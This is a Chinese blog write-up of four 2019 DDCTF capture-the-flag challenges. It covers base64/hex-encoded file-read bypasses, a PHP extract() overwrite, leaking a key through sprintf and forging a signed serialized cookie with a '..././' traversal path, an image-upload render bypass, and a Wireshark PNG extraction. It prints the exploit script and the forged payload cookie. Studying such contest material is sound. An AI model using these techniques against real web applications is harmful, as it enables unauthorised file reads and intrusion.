2019DDCTF 部分Writeup

最新推荐文章于 2022-08-20 00:20:17 发布
最新推荐文章于 2022-08-20 00:20:17 发布
阅读量1.9k 收藏 4
点赞数 1
文章标签: 2019DDCTF 2019DDCTF Writeup ddctf writeup 2019ddctf writeup Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Opt_98/article/details/89390006
版权

2019DDCTF 部分Writeup

太菜了,就只做了四道题,而且其中不乏大佬们的提示,这里就记录下做了的题…

Web

滴~

题目地址:http://117.51.150.246

打开后题目跳转到这个地址:http://117.51.150.246/index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09

界面显示如下图:

然后看传入的jpg的值是base64编码,于是拿去解密,随便找个在线base64解密的就行, TmpZMlF6WXhOamN5UlRaQk56QTJOdz09 这个解出来是 NjY2QzYxNjcyRTZBNzA2Nw== ,发现还是base64,于是继续解,解出来是 666C61672E6A7067 ,是十六进制,于是拿去转ascii字符串,解出来是 flag.jpg ,正好与界面显示的一样,于是就猜测要传入这样加密的值才能被它解析,F12查看元素属性也能看到还返回了base64加密后的内容,然后写个加密脚本查看 index.php 的内容:

<?php

echo base64_encode(base64_encode(bin2hex("index.php")));

解出来是 TmprMlpUWTBOalUzT0RKbE56QTJPRGN3 然后在传给jpg,这里我们用burpsuite来抓包查看:

然后就得到了 index.php 的源码:

<?php
/*
 * https://blog.csdn.net/FengBanLiuYun/article/details/80616607
 * Date: July 4,2018
 */
error_reporting(E_ALL || ~E_NOTICE);


header('content-type:text/html;charset=utf-8');
if(! isset($_GET['jpg']))
    header('Refresh:0;url=./index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09');
$file = hex2bin(base64_decode(base64_decode($_GET['jpg'])));
echo '<title>'.$_GET['jpg'].'</title>';
$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
echo $file.'</br>';
$file = str_replace("config","!", $file);
echo $file.'</br>';
$txt = base64_encode(file_get_contents($file));

echo "<img src='data:image/gif;base64,".$txt."'></img>";
/*
 * Can you find the flag file?
 *
 */

?>

发现给了个博客,于是点进去看了看也没发现有什么思路…后来有大佬提示了下说是看这个大佬的7月4日的博客,于是就知道了 .swp 这个临时备份文件,而在这篇博客中提到的是 practice.txt.swp 这个文件,于是用上面的加密方法把它加密后传给jpg:

然后这里就返回了一个 f1ag!ddctf.php 文件,于是拿它加密后传给jpg,发现并没回显什么东西,然后回过头去看 index.php 的源码发现下面这段要进行过滤:

$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
echo $file.'</br>';
$file = str_replace("config","!", $file);
echo $file.'</br>';

第一段正则表示匹配一个或多个除了 a-zA-Z0-9. 之外所有的字符,就这样 f1ag!ddctf.php 中的 ! 就被替换成空了,然后第二次替换则是将 config 替换成 ! ,于是写成 f1agconfigddctf.php 这样就可以绕过,然后将它加密后上传:

解密后发现又得到一段php代码:

<?php
include('config.php');
$k = 'hello';
extract($_GET);
if(isset($uid))
{
    $content=trim(file_get_contents($k));
    if($uid==$content)
	{
		echo $flag;
	}
	else
	{
		echo'hello';
	}
}

?>

这就是一道php中 extract() 变量覆盖函数的绕过的题了,这个题感觉在bugku还是其他什么地方做过,两个参数都置空就能绕过了,这样就拿到flag了:

WEB 签到题

题目地址:http://117.51.158.44/index.php

打开页面提示说:“抱歉,您没有登陆权限,请获取权限后访问-----”,于是用burpsuite来抓包,抓到一个post包:

发现 didictf_username: 这一栏是空的,填上admin试试:

返回了一个地址路径 app/fL2XID2i0Cdh.php ,访问看看,发现是两个php源码:

url:app/Application.php


Class Application {
    var $path = '';


    public function response($data, $errMsg = 'success') {
        $ret = ['errMsg' => $errMsg,
            'data' => $data];
        $ret = json_encode($ret);
        header('Content-type: application/json');
        echo $ret;

    }

    public function auth() {
        $DIDICTF_ADMIN = 'admin';
        if(!empty($_SERVER['HTTP_DIDICTF_USERNAME']) && $_SERVER['HTTP_DIDICTF_USERNAME'] == $DIDICTF_ADMIN) {
            $this->response('您当前当前权限为管理员----请访问:app/fL2XID2i0Cdh.php');
            return TRUE;
        }else{
            $this->response('抱歉,您没有登陆权限,请获取权限后访问-----','error');
            exit();
        }

    }
    private function sanitizepath($path) {
    $path = trim($path);
    $path=str_replace('../','',$path);
    $path=str_replace('..\\','',$path);
    return $path;
}

public function __destruct() {
    if(empty($this->path)) {
        exit();
    }else{
        $path = $this->sanitizepath($this->path);
        if(strlen($path) !== 18) {
            exit();
        }
        $this->response($data=file_get_contents($path),'Congratulations');
    }
    exit();
}
}

url:app/Session.php


include 'Application.php';
class Session extends Application {

    //key建议为8位字符串
    var $eancrykey                  = '';
    var $cookie_expiration			= 7200;
    var $cookie_name                = 'ddctf_id';
    var $cookie_path				= '';
    var $cookie_domain				= '';
    var $cookie_secure				= FALSE;
    var $activity                   = "DiDiCTF";


    public function index()
    {
	if(parent::auth()) {
            $this->get_key();
            if($this->session_read()) {
                $data = 'DiDI Welcome you %s';
                $data = sprintf($data,$_SERVER['HTTP_USER_AGENT']);
                parent::response($data,'sucess');
            }else{
                $this->session_create();
                $data = 'DiDI Welcome you';
                parent::response($data,'sucess');
            }
        }

    }

    private function get_key() {
        //eancrykey  and flag under the folder
        $this->eancrykey =  file_get_contents('../config/key.txt');
    }

    public function session_read() {
        if(empty($_COOKIE)) {
        return FALSE;
        }

        $session = $_COOKIE[$this->cookie_name];
        if(!isset($session)) {
            parent::response("session not found",'error');
            return FALSE;
        }
        $hash = substr($session,strlen($session)-32);
        $session = substr($session,0,strlen($session)-32);

        if($hash !== md5($this->eancrykey.$session)) {
            parent::response("the cookie data not match",'error');
            return FALSE;
        }
        $session = unserialize($session);


        if(!is_array($session) OR !isset($session['session_id']) OR !isset($session['ip_address']) OR !isset($session['user_agent'])){
            return FALSE;
        }

        if(!empty($_POST["nickname"])) {
            $arr = array($_POST["nickname"],$this->eancrykey);
            $data = "Welcome my friend %s";
            foreach ($arr as $k => $v) {
                $data = sprintf($data,$v);
            }
            parent::response($data,"Welcome");
        }

        if($session['ip_address'] != $_SERVER['REMOTE_ADDR']) {
            parent::response('the ip addree not match'.'error');
            return FALSE;
        }
        if($session['user_agent'] != $_SERVER['HTTP_USER_AGENT']) {
            parent::response('the user agent not match','error');
            return FALSE;
        }
        return TRUE;

    }

    private function session_create() {
        $sessionid = '';
        while(strlen($sessionid) < 32) {
            $sessionid .= mt_rand(0,mt_getrandmax());
        }

        $userdata = array(
            'session_id' => md5(uniqid($sessionid,TRUE)),
            'ip_address' => $_SERVER['REMOTE_ADDR'],
            'user_agent' => $_SERVER['HTTP_USER_AGENT'],
            'user_data' => '',
        );

        $cookiedata = serialize($userdata);
        $cookiedata = $cookiedata.md5($this->eancrykey.$cookiedata);
        $expire = $this->cookie_expiration + time();
        setcookie(
            $this->cookie_name,
            $cookiedata,
            $expire,
            $this->cookie_path,
            $this->cookie_domain,
            $this->cookie_secure
            );

    }
}


$ddctf = new Session();
$ddctf->index();

代码审计,发现了一段这个代码:

    private function get_key() {
        //eancrykey  and flag under the folder
        $this->eancrykey =  file_get_contents('../config/key.txt');
    }

直接访问 config 目录发现需要登录,题果然不会这么简单…

然后我们访问下 app/Session.php

它给我们设定了cookie的值,还返回了 DiDI Welcome you %s ,说明 $this->session_read() 为True,然后我们再看看 session_read() 函数,发现里面有段代码:

        if(!empty($_POST["nickname"])) {
            $arr = array($_POST["nickname"],$this->eancrykey);
            $data = "Welcome my friend %s";
            foreach ($arr as $k => $v) {
                $data = sprintf($data,$v);
            }
            parent::response($data,"Welcome");
        }

发现这段代码可以得到 $eancrykey ,但在这个 foreach 循环里,要在第二次的时候让 sprintf 格式化 $this->eancrykey 才能将其打印出来,如果传入的 nickname 为其他字符串,则在第一次 sprintf 就将其格式化了,这样在第二次 sprintf 的时候就没有作用了,所以我们应该传入 %s 绕过第一次格式化字符串使第二次格式化也有效,于是我们提交一个 nickname=%s 的post请求,但我这里出现一个问题就是用burpsuite提交post请求并没有什么回显,不知道是什么问题,后来我就用postman来提交post请求就有回显(也可以用hackbar试试):

这样就得到 $eancrykey 了…

回过头再去看 Application.php 的代码:

private function sanitizepath($path) {
    $path = trim($path);
    $path=str_replace('../','',$path);
    $path=str_replace('..\\','',$path);
    return $path;
}

public function __destruct() {
    if(empty($this->path)) {
        exit();
    }else{
        $path = $this->sanitizepath($this->path);
        if(strlen($path) !== 18) {
            exit();
        }
        $this->response($data=file_get_contents($path),'Congratulations');
    }
    exit();
}

这里我们看到最后的析构函数可以读取文件内容,那么这里就可以读取flag文件了,而上面提示说flag应该就在这个路径 ../config/flag.txt ,而这个路径要传到最后一步还需要经过 sanitizepath 函数,这里比较好绕过,这样写 ..././config/flag.txt 就可以绕过了,于是我们需要创建一个cookie将path传进去。

接下来我们看 Session.php 的一段代码:

$cookiedata = serialize($userdata);
$cookiedata = $cookiedata.md5($this->eancrykey.$cookiedata);

这段代码就是生成cookie的,先将数据序列化在进行md5加盐加密,这样最后就生成了cookie,所以我们要生成一个带路径的cookie传进去,于是写出下面的脚本:

<?php
include 'Application.php';

$eancrykey = 'EzblrbNS';

$aa = new Application();
$aa->path = '..././config/flag.txt';

//print_r(serialize($aa));

$cookiedata = serialize($aa);
$cookiedata = $cookiedata.md5($eancrykey.$cookiedata);

print_r(urlencode($cookiedata));

运行得到经过url加密的cookie:
O%3A11%3A%22Application%22%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A21%3A%22...%2F.%2Fconfig%2Fflag.txt%22%3B%7D5a014dbe49334e6dbb7326046950bee2

最后上传进去就能得到flag了:

Upload-IMG

题目地址:http://117.51.148.166/upload.php
user:dd@ctf
pass:DD@ctf#000

登录进去发现是上传图片的题目,于是随便上传一张图片试试:

它的提示是:“上传的图片源代码中未包含指定字符串:phpinfo()” ,于是想着用winhex在图片中插入 phpinfo() 字符串,发现它又返回:“请上传JPG/GIF/PNG格式的图片文件”,可能意思是它检测到里面有 phpinfo() ,于是被认为是php格式的文件了,这就很迷了,那说明这样插入字符串能被识别就并不能绕过,后来还将 phpinfo() 换着位置插入试了下,发现还能把网站上传崩了,不知道是什么情况…后面有大佬提示了下图片渲染,然后去搜了搜,发现了一篇文章:

upload-labs之pass 16详细分析

看了下,直接拿里面的 jpg_payload.php 脚本来用,先上传一张jpg图,然后把它返回的图下载下来,再用这个脚本处理这张图,然后会生成 payload_x.jpg ,再将这张经过脚本渲染的图上传上去,如果 [Check Error] ,那么又把返回的图下载下来,再用脚本渲染后又上传,重复几次,直到flag出现:

这道题我用web第一题的flag.jpg渲染了7次才出flag,但这个也要看原图是什么,有些图渲染几次也就出来了,这图有点迷…

MISC

Wireshark

简单的流量分析

一般拿到流量分析题都是先看http:

我们能看到有PNG图片,于是找到图片开始的位置:

将它导出,就得到一张钥匙的图片(这图刚开始用某照片查看器打开显示图片出错了,后面用画图直接就能打开了,windows自带的照片也能打开,画图感觉还不错):

看这图片的高度有点低,而且这钥匙还向下指着,于是想着用winhex改下图片高度:

这个地方就是改图片高度的位置,前面四个字节是图片的长度,将图片高度改高后保存打开:

就得到了key:xS8niJM7
得到key了但没密文呀,说明该找密文来解了,于是回去继续看流量包,从第一个HTTP包开始追踪TCP流:

然后看到了第一个get请求了一个网站:tools.jb51.net/aideddesign/img_add_info
打开发现是一个在线图片加密解密工具,那么这道题可能是一道图片解密题,于是继续往下翻,找找还有没有图片,翻到第五个的时候发现有张图片,但这张图片就是刚刚提取的那张钥匙图,于是接着翻…翻到第十三个流的时候发现了一张图片:

将它以原始数据的形式保存下来,然后把其余的内容用记事本或者winhex删了就得到一张新的图片了:

于是拿到刚才得到的解密网站上去解密,然后就得到了一串16进制字符串格式的flag:

拿去解密就得到最后的flag了:

观樂。
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DDCTF2019-WP-wireshark
yi_ke_wu_hua_guo的博客
04-24 882
wireshark 链接:https://pan.baidu.com/s/1HMZ0oO_fFy1RPpVv2rBzJQ 提取码:ru3f 打开pacp包直接过滤HTTP流量(wireshark题的信息多是隐藏在HTTP的url,html或者图片里面),直接过滤 可以看到流量中存在png包,分析整个HTTP流中存在3张图片的下载,并且如上图所示在第一个请求中存在网站请求http://tools...
DDCTF2019wp
CODER的博客
02-24 408
第一次参加这种个人的CTF比赛 真的比较难过 被打得有点自闭 赛后补题开始。 滴滴滴 这道题脑洞题 页面开始是一个心情复杂.jpg 23333 刚开始当然是手动F12看源码 然后发现字符串经过了转HEX+两次base64 于是写一个脚本搞他是很重要的~ 这之后就想到把index.php写进去 发现传进去之后有源码泄露 看到源码后给了一个csdn 这个hint非常的辣鸡。。 自闭了很久 直到下面...
2019DDctfWP
BerL1n
12-29 503
Time: 2019-04-27 11:46 本来想挺进前三十呢,结果大佬们都太强了,无奈。。 web 滴~ 打开界面就一张图片。 注意url http://117.51.150.246/index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09 参数这经过一次base16,两次base64,加密,解密后也就是flag.jpg,因此可尝试读取index.php,经过加密后为TmprMlJUWTBOalUzT0RKRk56QTJPRGN3 访问源代码 base64解
【CTF】DDCTF-2019
qq_48201589的博客
08-20 224
虽然刚导出的http文件中包含一个已存在的看似相同的风景图片,但文件大小却不相同,可以猜测一个是加密之前的图片,另外一个则是被加密后的。将多余的信息删除,只留下PNG文件(以89 50 4E 47 开头,以49 45 4E 44结尾)。下载附件,是一个PCAPNG文件,使用wireshark包打开,并搜索http协议的包。那么另外一张图片就是加密图片了,通过之前寻找到的网站进行解密,得到base16的密文。选择文件时可以看到带有钥匙的图片明显存在高度被隐藏。,还有一些PNG等文件,将文件导出。
ISCC2019-WEB4-Writeup
小糊涂仙
06-03 335
0x00 这道题整体思路是变量覆盖: PHP中会产生变量覆盖的函数有以下几种可能: $$使用不当(PHP中这种写法表示可变变量) extract函数使用不当 parse_str函数使用不当(本题就是这个函数导致的变量覆盖) import_request_variables使用不当 开启全局变量 以上这些变量覆盖的例子可查看如下博客:ht...
2019.4 DDCTF web题--滴 writeup
04-14
DDCTF,2019年4月比赛,web题,第一题--滴 writeup,及flag。
2019美亚杯writeup
03-26
本资源摘要信息来自2019美亚杯writeup,内容涉及电子数据取证大赛的相关检材和试题等。电子数据取证大赛是一项测试电子数据取证和分析能力的比赛,参赛者需要对提供的镜像文件进行分析,回答相关问题。 本资源摘要...
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
Codefest'2019 CTF writeup
2019dxs.docx
09-24
这篇文档主要记录的是2019年全国大学生信息安全竞赛的部分挑战解决方案,涵盖了多个信息安全领域的知识点。下面是这些挑战的详细解析: 0x00 Reverse--easyGo: 这是一个逆向工程题目,参赛者需要对一个用Go语言...
2019年CTF5月比赛记录(一):ISCC_2019线上赛部分题目writeup
極品━═☆宏的博客
05-25 3193
ISCC战线拉得蛮长的,从5月1号一直干到25号。我之前也没参加过ISCC,就第一次参加做题情况来看,除了第一天结束后排名在前100,之后就再也没往上走过,尼玛一直掉啊,心疼啊。我一个web手竟然要靠做Misc上分
ISCC2019-MISC-Writeup-Aesop's chest and key lie within. To find it.
小糊涂仙
06-03 307
0x00 下载附件发现是一张图片: 0x01 就是这样一张跳来跳去的图片,用notepad++打开在结尾处有这么一段类似base64的编码: 0x02 第一反应当然是base64解码一下,得出的结果是: 0x03 没错,就是乱码了,所以就去百度了一下,发现是AES加密,于是AES解密一下?发现无法解密,如下图: 0x04 于是想到应该是有秘钥,再观察一下图片,发现...
DDCTF 2019 writeup Wireshark
Barzar的博客
04-20 1606
DDCTF 2019 Wireshark写在最前分析数据包分析文件解码 写在最前 总的来说这是一道挺常规的Wireshark分析题,一般的wireshark题的信息总是隐藏在http的url,html或者图片里面,所以一般拿到Wireshark的题直接奔http就行啦 要是不在http我就不承认我说过这句话 Wireshark数据包下载地址 分析数据包 拿到数据包先搜索http 通过分析发现ht...
ISCC 2019 杂项 answer to everything (sha1 得到了一个神秘的二进制文件。寻找文件中的flag,解锁宇宙的秘密。)
qq_42777804的博客
05-08 2370
依旧是先下载 解压后打开 是一个 exe 文件 据说逆向题目需要用到 IDA 那就用IDA 打开 点点看看 发现了主函数里 的 信息 居然 not_the_flag 接着点开看看 在此处 点击 not_the_flag 之后 按 F5 查看伪代码 发现了这个 kdudpeh 翻译为没有任何标签的B...
wireshark
→_→
12-09 823
wireshark (来源:攻防世界) 1.关卡描述 2.解题步骤 分析: 题目只告诉我们这是一道简单的流量分析,来源是DDCTF,这个一看就不简单: 看了一下协议,重点就是TCP,HTTP,最重要的是有一个SSDP,这个没学过(笔记:结果也用不上) 我们先看看能导出哪些对象: 看到这3个链接,去找了一下,发现跟贴图库有关,有用的价值不大 up.imgapi.com i2.bvimg.com www.tietuku.com 看到了几个有趣的文件名,追踪流看看: 这两个链接
DDCTF-misc-流量分析
weixin_30480651的博客
04-23 616
这题做到最后发现还是挺简单的 找到密钥,导入,过滤,get flag。 刚开始一直被一个压缩包迷惑着,一直说缺少文件尾什么的, 最后有一个想法,是不是数据包中还有东西没提取出来 在这里,follow TCP 发现base64以及,提到的image001.png,一开始在线解一直解不出来,于是写代码试解 import base64 txt = open("mis...
【LinkCTF-29】Misc--非常简单的流量分析
VZZmieshenquan的博客
03-02 2431
Description: 非常简单的流量分析 Solution: 先过滤http,发现robots文件,追踪http流发现abc.html 再过滤abc.html文件,查看http流,发现密文 发现很多加密过的文件(都是IPSec加密后的流量) 用之前得到的密文来解密,点击这里进行解密 依次输入密文 然后发现http带着ASCII码 得到了Thereisnoflaghere,p...
DDCTF2019-WRITEUP
郁离歌丶的博客
05-04 2880
WEB 滴~ 进去之后就看到url一串base64,解两次是flag.jpg,明显文件读取,读一下index.php,发现居然给了博客。这是恶意引流吧,服了。在出题人博客里面找到.practice.txt.swp,然鹅.practice.txt.swp404了,而practice.txt.swp却能访问???佛了。 内容是f1ag!ddctf.php,然后在index.php的源码里面发现他将co...
AeroCTF 2019 部分题目Writeup
iqiqiya的博客
03-27 1581
0x01: 【Forensic】undefined protocol 题目说明:We managed to get traffic from the machine of one of the hackers who hacked our navigation systems, but they use some kind of strange protocol over TCP. We wer...
iscc2015官方writeup
最新发布
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值